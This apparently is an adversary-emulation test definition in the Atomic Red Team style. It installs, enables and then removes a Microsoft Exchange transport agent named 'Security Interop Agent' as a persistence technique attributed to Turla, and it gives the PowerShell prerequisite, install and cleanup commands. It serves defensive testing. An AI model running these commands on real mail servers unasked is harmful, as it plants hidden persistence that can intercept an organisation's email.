#TechniqueName: Server Software Component: Transport Agent
#AtomicTestName: Install MS Exchange Transport Agent Persistence
#Description: Install a Microsoft Exchange Transport Agent for persistence. This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. Seen in use by Turla.&More details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help&
#Language: ps1

#get_prereq_commands
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn


#commands
Install-TransportAgent -Name Security Interop Agent -TransportAgentFactory Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory -AssemblyPath c:\program files\microsoft\Exchange Server\v15\bin\Microsoft.Exchange.Security.Interop.dll
Enable-TransportAgent Security Interop Agent
Get-TransportAgent | Format-List Name,Enabled


#cleanup_commands
if(Get-Command "Get-TransportAgent" -ErrorAction Ignore){
  Disable-TransportAgent Security Interop Agent
  Uninstall-TransportAgent Security Interop Agent
  Get-TransportAgent
}

